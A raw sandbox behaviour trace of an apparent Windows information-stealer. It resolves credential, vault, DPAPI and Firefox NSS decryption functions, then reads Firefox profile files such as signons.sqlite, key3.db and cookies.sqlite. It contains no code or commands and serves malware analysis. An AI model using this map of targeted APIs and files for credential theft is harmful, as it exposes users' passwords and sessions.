Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	2	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	2	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	2	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	2	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	2	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	2	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	2	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	2	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	2	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	2	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQuerySystemInformation, address_out = 0x77ccfda0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToLocalFileTime, address_out = 0x759de29e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToDosDateTime, address_out = 0x759ec86d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempFileNameW, address_out = 0x759fd1b6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalUnlock, address_out = 0x759ecfdf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x759d168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x759d196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MapViewOfFile, address_out = 0x759d18f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x759d1826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x759eeceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynA, address_out = 0x759e192a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x759fd556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x759d5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x759d1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileMappingW, address_out = 0x759d1909	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetPrivateProfileIntW, address_out = 0x759f298b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetPrivateProfileStringW, address_out = 0x759dea48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetPrivateProfileSectionNamesW, address_out = 0x75a4a1ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetWindowsDirectoryW, address_out = 0x759d43e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDllDirectoryW, address_out = 0x75a5004f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x759ec807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisableThreadLibraryCalls, address_out = 0x759d48e5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandle, address_out = 0x759d53ae	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalLock, address_out = 0x759ed0a7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerW, address_out = 0x758d7647	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredFree, address_out = 0x7774b2ec	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyExW, address_out = 0x777546c8	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumValueW, address_out = 0x777548cc	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x7774df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredEnumerateW, address_out = 0x77787481	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyW, address_out = 0x77752459	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = OleInitialize, address_out = 0x75afefd7	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoTaskMemFree, address_out = 0x75b36f41	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = OleUninitialize, address_out = 0x75afeba1	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = GetHGlobalFromStream, address_out = 0x75b041d5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIA, address_out = 0x7637d250	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIA, address_out = 0x7637d11c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7638bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrRChrIW, address_out = 0x763ae782	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CertOpenSystemStoreW, address_out = 0x7627c8d1	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CertCloseStore, address_out = 0x7624dd10	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptUnprotectData, address_out = 0x76275a7f	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = PFXExportCertStoreEx, address_out = 0x762d1061	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CertEnumCertificatesInStore, address_out = 0x7624e33a	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = memcpy, address_out = 0x75e79910	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = _adjust_fdiv, address_out = 0x75f132ec	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = strchr, address_out = 0x75e7dbeb	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = memmove, address_out = 0x75e79e5a	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = malloc, address_out = 0x75e79cee	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = atoi, address_out = 0x75e7dbe0	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = _vsnwprintf, address_out = 0x75e7bbce	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = _vsnprintf, address_out = 0x75e7d1a8	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = memset, address_out = 0x75e79790	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = _initterm, address_out = 0x75e7c151	1	Fn
Get Address	c:\windows\syswow64\msvcrt.dll	function = free, address_out = 0x75e79894	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = FindFirstUrlCacheEntryW, address_out = 0x75f5978a	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = DeleteUrlCacheEntryW, address_out = 0x75f79573	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = FindCloseUrlCache, address_out = 0x75f68409	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = FindNextUrlCacheEntryW, address_out = 0x75f5989c	1	Fn
Get Address	Unknown module name	function = PStoreCreateInstance, address_out = 0x74f1526c	1	Fn
Get Address	Unknown module name	function = VaultOpenVault, address_out = 0x74ea26a9	1	Fn
Get Address	Unknown module name	function = VaultCloseVault, address_out = 0x74ea2718	1	Fn
Get Address	Unknown module name	function = VaultEnumerateItems, address_out = 0x74ea3099	1	Fn
Get Address	Unknown module name	function = VaultGetItem, address_out = 0x74ea3242	2	Fn
Get Address	Unknown module name	function = VaultFree, address_out = 0x74ea4321	1	Fn
Get Address	Unknown module name	function = NSS_Init, address_out = 0x7454d70b	1	Fn
Get Address	Unknown module name	function = NSS_Shutdown, address_out = 0x7454d13c	1	Fn
Get Address	Unknown module name	function = SECITEM_FreeItem, address_out = 0x7454e656	1	Fn
Get Address	Unknown module name	function = PK11_GetInternalKeySlot, address_out = 0x744e3c51	1	Fn
Get Address	Unknown module name	function = PK11_Authenticate, address_out = 0x744cd3ca	1	Fn
Get Address	Unknown module name	function = PK11SDR_Decrypt, address_out = 0x744e00a7	1	Fn
Get Address	Unknown module name	function = PK11_FreeSlot, address_out = 0x744e3333	1	Fn
Get Address	Unknown module name	function = PStoreCreateInstance, address_out = 0x7429526c	1	Fn
Get Address	Unknown module name	function = FCICreate, address_out = 0x75108e91	1	Fn
Get Address	Unknown module name	function = FCIAddFile, address_out = 0x75108cd4	1	Fn
Get Address	Unknown module name	function = FCIFlushCabinet, address_out = 0x75108db8	1	Fn
Get Address	Unknown module name	function = FCIDestroy, address_out = 0x75108e46	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0	2	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0	2	Fn
